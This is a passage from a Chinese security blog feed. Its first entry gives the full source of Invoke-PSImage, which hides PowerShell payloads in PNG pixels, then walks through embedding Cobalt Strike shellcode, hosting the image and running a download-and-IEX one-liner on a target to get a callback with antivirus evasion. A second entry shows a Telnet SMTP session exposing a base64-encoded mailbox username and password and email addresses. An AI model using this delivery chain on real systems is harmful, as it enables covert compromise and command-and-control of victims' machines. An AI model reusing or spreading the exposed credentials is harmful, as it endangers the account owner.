<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Invoke-PSImage</span></span></span><br><span class="line">{</span><br><span class="line"><span class="comment"><#</span></span><br><span class="line"><span class="comment"><span class="doctag">.SYNOPSIS</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Embeds a PowerShell script in an image and generates a oneliner to execute it.</span></span><br><span class="line"><span class="comment">Author: Barrett Adams (@peewpw)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.DESCRIPTION</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">This tool can either create an image with just the target data, or can embed the payload in</span></span><br><span class="line"><span class="comment">an existing image. When embeding, the least significant 4 bits of 2 color values (2 of RGB) in</span></span><br><span class="line"><span class="comment">each pixel (for as many pixels as are needed for the payload). Image quality will suffer as</span></span><br><span class="line"><span class="comment">a result, but it still looks decent. The image is saved as a PNG, and can be losslessly</span></span><br><span class="line"><span class="comment">compressed without affecting the ability to execute the payload as the data is stored in the</span></span><br><span class="line"><span class="comment">colors themselves. It can accept most image types as input, but output will always be a PNG</span></span><br><span class="line"><span class="comment">because it needs to be lossless.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Script</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The path to the script to embed in the Image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Out</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The file to save the resulting image to (image will be a PNG)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Image</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The image to embed the script in. (optional)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER WebRequest</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Output a command for reading the image from the web using Net.WebClient.</span></span><br><span class="line"><span class="comment">You will need to host the image and insert the URL into the command.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER PictureBox</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Output a command for reading the image from the web using System.Windows.Forms.PictureBox.</span></span><br><span class="line"><span class="comment">You will need to host the image and insert the URL into the command.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.EXAMPLE</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">PS>Import-Module .\Invoke-PSImage.ps1</span></span><br><span class="line"><span class="comment">PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg </span></span><br><span class="line"><span class="comment"> [Oneliner to execute from a file]</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment">#></span></span><br><span class="line"></span><br><span class="line"> <span class="function">[<span class="type">CmdletBinding</span>()] <span class="keyword">Param</span></span> (</span><br><span class="line"> [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">0</span>, <span class="type">Mandatory</span> = <span class="variable">$True</span>)]</span><br><span class="line"> [<span class="built_in">String</span>]</span><br><span class="line"> <span class="variable">$Script</span>,</span><br><span class="line"> </span><br><span class="line"> [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">1</span>, <span class="type">Mandatory</span> = <span class="variable">$True</span>)]</span><br><span class="line"> [<span class="built_in">String</span>]</span><br><span class="line"> <span class="variable">$Out</span>,</span><br><span class="line"> </span><br><span class="line"> [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">2</span>, <span class="type">Mandatory</span> = <span class="variable">$False</span>)]</span><br><span class="line"> [<span class="built_in">String</span>]</span><br><span class="line"> <span class="variable">$Image</span>,</span><br><span class="line"></span><br><span class="line"> [<span class="type">switch</span>] <span class="variable">$WebClient</span>,</span><br><span class="line"> </span><br><span class="line"> [<span class="type">switch</span>] <span class="variable">$PictureBox</span></span><br><span class="line"> )</span><br><span class="line"> <span class="comment"># Stop if we hit an error instead of making more errors</span></span><br><span class="line"> <span class="variable">$ErrorActionPreference</span> = <span class="string">"Stop"</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Load some assemblies</span></span><br><span class="line"> [<span class="built_in">void</span>] [<span class="type">System.Reflection.Assembly</span>]::LoadWithPartialName(<span class="string">"System.Drawing"</span>)</span><br><span class="line"> [<span class="built_in">void</span>] [<span class="type">System.Reflection.Assembly</span>]::LoadWithPartialName(<span class="string">"System.Web"</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Normalize paths beacuse powershell is sometimes bad with them.</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Script</span>)){</span><br><span class="line"> <span class="variable">$Script</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Script</span>))</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Out</span>)){</span><br><span class="line"> <span class="variable">$Out</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Out</span>))</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$testurl</span> = <span class="string">"http://example.com/"</span> + [<span class="type">System.IO.Path</span>]::GetFileName(<span class="variable">$Out</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Read in the script</span></span><br><span class="line"> <span class="variable">$ScriptBlockString</span> = [<span class="type">IO.File</span>]::ReadAllText(<span class="variable">$Script</span>)</span><br><span class="line"> <span class="variable">$in</span> = [<span class="type">ScriptBlock</span>]::Create(<span class="variable">$ScriptBlockString</span>)</span><br><span class="line"> <span class="variable">$payload</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span class="variable">$in</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$Image</span>) {</span><br><span class="line"> <span class="comment"># Normalize paths beacuse powershell is sometimes bad with them.</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Image</span>)){</span><br><span class="line"> <span class="variable">$Image</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Image</span>))</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Read the image into a bitmap</span></span><br><span class="line"> <span class="variable">$img</span> = <span class="built_in">New-Object</span> System.Drawing.Bitmap(<span class="variable">$Image</span>)</span><br><span class="line"></span><br><span class="line"> <span class="variable">$width</span> = <span class="variable">$img</span>.Size.Width</span><br><span class="line"> <span class="variable">$height</span> = <span class="variable">$img</span>.Size.Height</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Lock the bitmap in memory so it can be changed programmatically.</span></span><br><span class="line"> <span class="variable">$rect</span> = <span class="built_in">New-Object</span> System.Drawing.Rectangle(<span class="number">0</span>, <span class="number">0</span>, <span class="variable">$width</span>, <span class="variable">$height</span>);</span><br><span class="line"> <span class="variable">$bmpData</span> = <span class="variable">$img</span>.LockBits(<span class="variable">$rect</span>, [<span class="type">System.Drawing.Imaging.ImageLockMode</span>]::ReadWrite, <span class="variable">$img</span>.PixelFormat)</span><br><span class="line"> <span class="variable">$ptr</span> = <span class="variable">$bmpData</span>.Scan0</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Copy the RGB values to an array for easy modification</span></span><br><span class="line"> <span class="variable">$bytes</span> = [<span class="type">Math</span>]::Abs(<span class="variable">$bmpData</span>.Stride) * <span class="variable">$img</span>.Height</span><br><span class="line"> <span class="variable">$rgbValues</span> = <span class="built_in">New-Object</span> byte[] <span class="variable">$bytes</span>;</span><br><span class="line"> [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$ptr</span>, <span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$bytes</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Check that the payload fits in the image </span></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$bytes</span>/<span class="number">2</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length) {</span><br><span class="line"> <span class="built_in">Write-Error</span> <span class="string">"Image not large enough to contain payload!"</span></span><br><span class="line"> <span class="variable">$img</span>.UnlockBits(<span class="variable">$bmpData</span>)</span><br><span class="line"> <span class="variable">$img</span>.Dispose()</span><br><span class="line"> <span class="keyword">Break</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Generate a random string to use to fill other pixel info in the picture.</span></span><br><span class="line"> <span class="comment"># (Calling get-random everytime is too slow)</span></span><br><span class="line"> <span class="variable">$randstr</span> = [<span class="type">System.Web.Security.Membership</span>]::GeneratePassword(<span class="number">128</span>,<span class="number">0</span>)</span><br><span class="line"> <span class="variable">$randb</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span class="variable">$randstr</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># loop through the RGB array and copy the payload into it</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$counter</span> = <span class="number">0</span>; <span class="variable">$counter</span> <span class="operator">-lt</span> (<span class="variable">$rgbValues</span>.Length)/<span class="number">3</span>; <span class="variable">$counter</span>++) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$counter</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length){</span><br><span class="line"> <span class="variable">$paybyte1</span> = [<span class="type">math</span>]::Floor(<span class="variable">$payload</span>[<span class="variable">$counter</span>]/<span class="number">16</span>)</span><br><span class="line"> <span class="variable">$paybyte2</span> = (<span class="variable">$payload</span>[<span class="variable">$counter</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> <span class="variable">$paybyte3</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">2</span>)%<span class="number">109</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$paybyte1</span> = (<span class="variable">$randb</span>[<span class="variable">$counter</span>%<span class="number">113</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> <span class="variable">$paybyte2</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">1</span>)%<span class="number">67</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> <span class="variable">$paybyte3</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">2</span>)%<span class="number">109</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span class="variable">$paybyte1</span></span><br><span class="line"> <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">1</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">1</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span class="variable">$paybyte2</span></span><br><span class="line"> <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">2</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">2</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span class="variable">$paybyte3</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Copy the array of RGB values back to the bitmap</span></span><br><span class="line"> [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$ptr</span>, <span class="variable">$bytes</span>)</span><br><span class="line"> <span class="variable">$img</span>.UnlockBits(<span class="variable">$bmpData</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Write the image to a file</span></span><br><span class="line"> <span class="variable">$img</span>.Save(<span class="variable">$Out</span>, [<span class="type">System.Drawing.Imaging.ImageFormat</span>]::Png)</span><br><span class="line"> <span class="variable">$img</span>.Dispose()</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Get a bunch of numbers we need to use in the oneliner</span></span><br><span class="line"> <span class="variable">$rows</span> = [<span class="type">math</span>]::Ceiling(<span class="variable">$payload</span>.Length/<span class="variable">$width</span>)</span><br><span class="line"> <span class="variable">$array</span> = (<span class="variable">$rows</span>*<span class="variable">$width</span>)</span><br><span class="line"> <span class="variable">$lrows</span> = (<span class="variable">$rows</span><span class="literal">-1</span>)</span><br><span class="line"> <span class="variable">$lwidth</span> = (<span class="variable">$width</span><span class="literal">-1</span>)</span><br><span class="line"> <span class="variable">$lpayload</span> = (<span class="variable">$payload</span>.Length<span class="literal">-1</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$WebClient</span>) {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(`"<span class="variable">$testurl</span>`"));`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$PictureBox</span>) {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Windows.Forms;(`$d=a System.Windows.Forms.PictureBox).Load(`"<span class="variable">$testurl</span>`");`$g=`$d.Image;`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap(`"<span class="variable">$Out</span>`");`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G-band15))}};`$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$pscmd</span></span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment"># Decide how large our image needs to be (always square for easy math)</span></span><br><span class="line"> <span class="variable">$side</span> = ([<span class="built_in">int</span>] ([<span class="type">math</span>]::ceiling([<span class="type">math</span>]::Sqrt([<span class="type">math</span>]::ceiling(<span class="variable">$payload</span>.Length / <span class="number">3</span>)) + <span class="number">3</span>) / <span class="number">4</span>)) * <span class="number">4</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Decide how large our image needs to be (always square for easy math)</span></span><br><span class="line"> <span class="variable">$rgbValues</span> = <span class="built_in">New-Object</span> byte[] (<span class="variable">$side</span> * <span class="variable">$side</span> * <span class="number">3</span>);</span><br><span class="line"> <span class="variable">$randstr</span> = [<span class="type">System.Web.Security.Membership</span>]::GeneratePassword(<span class="number">128</span>,<span class="number">0</span>)</span><br><span class="line"> <span class="variable">$randb</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span class="variable">$randstr</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># loop through the RGB array and copy the payload into it</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$counter</span> = <span class="number">0</span>; <span class="variable">$counter</span> <span class="operator">-lt</span> (<span class="variable">$rgbValues</span>.Length); <span class="variable">$counter</span>++) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$counter</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length){</span><br><span class="line"> <span class="variable">$rgbValues</span>[<span class="variable">$counter</span>] = <span class="variable">$payload</span>[<span class="variable">$counter</span>]</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$rgbValues</span>[<span class="variable">$counter</span>] = <span class="variable">$randb</span>[<span class="variable">$counter</span>%<span class="number">113</span>]</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Copy the array of RGB values back to the bitmap</span></span><br><span class="line"> <span class="variable">$ptr</span> = [<span class="type">System.Runtime.InteropServices.Marshal</span>]::AllocHGlobal(<span class="variable">$rgbValues</span>.Length)</span><br><span class="line"> [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$ptr</span>, <span class="variable">$rgbValues</span>.Length)</span><br><span class="line"> <span class="variable">$img</span> = <span class="built_in">New-Object</span> System.Drawing.Bitmap(<span class="variable">$side</span>, <span class="variable">$side</span>, (<span class="variable">$side</span>*<span class="number">3</span>), [<span class="type">System.Drawing.Imaging.PixelFormat</span>]::Format24bppRgb, <span class="variable">$ptr</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Write the image to a file</span></span><br><span class="line"> <span class="variable">$img</span>.Save(<span class="variable">$Out</span>, [<span class="type">System.Drawing.Imaging.ImageFormat</span>]::Png)</span><br><span class="line"> <span class="variable">$img</span>.Dispose()</span><br><span class="line"> [<span class="type">System.Runtime.InteropServices.Marshal</span>]::FreeHGlobal(<span class="variable">$ptr</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Get a bunch of numbers we need to use in the oneliner</span></span><br><span class="line"> <span class="variable">$array</span> = (<span class="variable">$side</span>*<span class="variable">$side</span>)*<span class="number">3</span></span><br><span class="line"> <span class="variable">$lrows</span> = (<span class="variable">$side</span><span class="literal">-1</span>)</span><br><span class="line"> <span class="variable">$lwidth</span> = (<span class="variable">$side</span><span class="literal">-1</span>)</span><br><span class="line"> <span class="variable">$width</span> = (<span class="variable">$side</span>)</span><br><span class="line"> <span class="variable">$lpayload</span> = (<span class="variable">$payload</span>.Length<span class="literal">-1</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$WebClient</span>) {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(`"<span class="variable">$testurl</span>`"));`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$PictureBox</span>) {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Windows.Forms;(`$d=a System.Windows.Forms.PictureBox).Load(`"<span class="variable">$testurl</span>`");`$g=`$d.Image;`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap(`"<span class="variable">$Out</span>`");`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%{foreach(`$x in(0..<span class="variable">$lwidth</span>)){`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*<span class="variable">$width</span>+`$x)*3]=`$p.B;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+1]=`$p.G;`$o[(`$_*<span class="variable">$width</span>+`$x)*3+2]=`$p.R}};`$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$pscmd</span></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h5 id="CS生成Shellcode"><a href="#CS生成Shellcode" class="headerlink" title="CS生成Shellcode"></a>CS生成Shellcode</h5><p>Attacks >> Packages >> Payload Generator 生成Shellcode </p>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210416092120420.png" alt="image-20210416092120420"></p>
<h5 id="生成Shellcode图片"><a href="#生成Shellcode图片" class="headerlink" title="生成Shellcode图片"></a>生成Shellcode图片</h5><figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 1、设置策略不受限制,范围为当前用户;可get-ExecutionPolicy-List查看当前策略</span></span><br><span class="line"><span class="built_in">Set-ExecutionPolicy</span> Unrestricted <span class="literal">-Scope</span> CurrentUser</span><br><span class="line"><span class="comment"># 2、导入下载的Invoke-PSimage.ps1模块</span></span><br><span class="line"><span class="built_in">Import-Module</span> .\<span class="built_in">Invoke-PSimage</span>.ps1</span><br><span class="line"><span class="comment"># 3、生成 shellcode 的图片</span></span><br><span class="line"><span class="built_in">Invoke-PSImage</span> <span class="literal">-Script</span> .\payload.ps1 <span class="literal">-Image</span> .\<span class="number">2021</span>.jpg <span class="literal">-Out</span> .\<span class="number">2021</span>.png <span class="literal">-Web</span></span><br><span class="line"><span class="comment"># 参数介绍</span></span><br><span class="line"><span class="literal">-Script</span> [<span class="type">filepath</span>]嵌入到图像中的脚本的路径。</span><br><span class="line"><span class="literal">-Out</span> [<span class="type">filepath</span>]将结果图像保存到的文件(图像将为PNG)</span><br><span class="line"><span class="literal">-Image</span> [<span class="type">filepath</span>]要嵌入脚本的图像。</span><br><span class="line"><span class="literal">-Web</span> 输出用于使用Net.WebClient从Web读取图像的命令。</span><br></pre></td></tr></table></figure>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415202230131.png" alt="image-20210415202230131"></p>
<h5 id="HTTP服务"><a href="#HTTP服务" class="headerlink" title="HTTP服务"></a>HTTP服务</h5><p>将生成的图片放在HTTP服务,这里用python3起了个HTTP服务</p>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415202655248.png" alt="image-20210415202655248"></p>
<h5 id="效果"><a href="#效果" class="headerlink" title="效果"></a>效果</h5><p>靶机机powershell运行命令,成功上线。</p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="comment"># http://example.com/2021.png 替换你图片地址</span></span><br><span class="line"></span><br><span class="line">sal a <span class="built_in">New-Object</span>;<span class="built_in">Add-Type</span> <span class="literal">-A</span> System.Drawing;<span class="variable">$g</span>=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(<span class="string">"http://example.com/2021.png"</span>));<span class="variable">$o</span>=a Byte[] <span class="number">3696</span>;(<span class="number">0</span>..<span class="number">20</span>)|%{<span class="keyword">foreach</span>(<span class="variable">$x</span> <span class="keyword">in</span>(<span class="number">0</span>..<span class="number">175</span>)){<span class="variable">$p</span>=<span class="variable">$g</span>.GetPixel(<span class="variable">$x</span>,<span class="variable">$_</span>);<span class="variable">$o</span>[<span class="variable">$_</span>*<span class="number">176</span>+<span class="variable">$x</span>]=([<span class="type">math</span>]::Floor((<span class="variable">$p</span>.B<span class="literal">-band15</span>)*<span class="number">16</span>)<span class="operator">-bor</span>(<span class="variable">$p</span>.G <span class="operator">-band</span> <span class="number">15</span>))}};IEX([<span class="type">System.Text.Encoding</span>]::ASCII.GetString(<span class="variable">$o</span>[<span class="number">0</span><span class="type">..3598</span>]))</span><br></pre></td></tr></table></figure>
<p><img src="/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415201441673.png" alt="image-20210415201441673"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://github.com/dayuxiyou/Invoke-PSImage" target="_blank" rel="noopener">https://github.com/dayuxiyou/Invoke-PSImage</a></p>
<p><a href="https://www.freebuf.com/articles/web/262978.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/262978.html</a></p>
]]></content>
</entry>
<entry>
<title>Telnet 测试邮件协议</title>
<url>/2021/04/14/Telnet%20SMTP/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h5 id="smtp"><a href="#smtp" class="headerlink" title="smtp"></a>smtp</h5><p><img src="/img/Telnet%20SMTP/image-20210414093817371.png" alt="image-20210414093817371"></p>
<a id="more"></a>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">telnet smtp.163.com 25 <span class="comment"># telnet 连接</span></span><br><span class="line">220 163.com Anti-spam GT <span class="keyword">for</span> Coremail System (163com[20141201])</span><br><span class="line">helo 163.com <span class="comment">#163.com可以随便任意字符;EHLO 是扩展的简单邮件传输协议 (ESMTP) 命令动词,该命令动词是在 RFC 2821 中定义的。ESMTP 服务器可在初始连接时公布其功能。这些功能包括其最大的可接受邮件大小以及其支持的身份验证方法。HELO 是 RFC 821 中定义的旧版 SMTP 命令动词。多数 SMTP 邮件服务器都支持 ESMTP 和 EHLO。</span></span><br><span class="line">250 OK</span><br><span class="line">auth login <span class="comment">#认证登陆</span></span><br><span class="line">334 dXNlcm5hbWU6</span><br><span class="line">aXR4aWFvd2VpNzU1 <span class="comment">#邮箱用户名base64编码</span></span><br><span class="line">334 UGFzc3dvcmQ6</span><br><span class="line">VUdFRVhRU0hGS0dBQ1hJRA== <span class="comment">#邮箱密码(或授权码)base64编码</span></span><br><span class="line">235 Authentication successful</span><br><span class="line">mail from:<itxiaowei755@163.com> <span class="comment">#发件人</span></span><br><span class="line">250 Mail OK</span><br><span class="line">rcpt to:<79898326@qq.com> <span class="comment">#收件人</span></span><br><span class="line">250 Mail OK</span><br><span class="line">data <span class="comment">#开始写邮件</span></span><br><span class="line">354 End data with <CR><LF>.<CR><LF></span><br><span class="line">from:itxiaowei755@163.com <span class="comment">#发件人名称,此项可以任意填入,将显示在收件箱的发件人一栏</span></span><br><span class="line">to:79898326@qq.com <span class="comment">#收件人名称,可任意填入,将显示在收件箱的收件人一栏。</span></span><br><span class="line">date:10/10/2021 <span class="comment">#发信日期</span></span><br><span class="line">subject:hello smtp <span class="comment">#邮件主题</span></span><br><span class="line"> <span class="comment">#需空一行表示正文开始</span></span><br><span class="line">tyachedtothisletter.Imnowwritingtoaskifyoucanwriteareferencefor... <span class="comment">#正文内容</span></span><br><span class="line">. <span class="comment">#.回车 发送邮件</span></span><br><span class="line">250 Mail OK queued as smtp7,C8CowABnYuAHRnZgpUBPXA--.60300S2 1618364054 <span class="comment">#返回250表示发送成功</span></span><br><span class="line">quit <span class="comment">#退出</span></span><br></pre></td></tr></table></figure>
<h5 id="pop3"><a href="#pop3" class="headerlink" title="pop3"></a>pop3</h5><p><img src="/img/Telnet%20SMTP/image-20210413180236367.png" alt="image-20210413180236367"></p>
